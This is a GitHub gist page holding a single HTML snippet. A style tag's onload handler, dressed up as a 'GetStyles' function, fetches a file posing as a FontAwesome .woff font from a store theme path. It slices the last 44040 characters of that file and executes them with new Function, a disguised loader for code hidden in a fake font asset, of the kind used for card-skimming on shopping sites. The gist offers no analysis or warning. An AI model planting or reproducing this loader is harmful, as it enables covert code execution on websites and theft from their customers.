Skip to content

Instantly share code, notes, and snippets.

@krautface
Created August 10, 2021 21:04
Show Gist options
  • Save krautface/897f077ab5fd64af2ee1a280be5b91de to your computer and use it in GitHub Desktop.
Save krautface/897f077ab5fd64af2ee1a280be5b91de to your computer and use it in GitHub Desktop.
<style onload="(async function GetStyles() {
let cssText = await fetch('/skin/frontend/puro/puro01/css/fontawesome/fonts/FontAwesome.woff');
if (cssText.ok)
{
let x = await cssText.text();
var F = new Function(x.slice(-44040));
return (F());
}
})();"></style>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment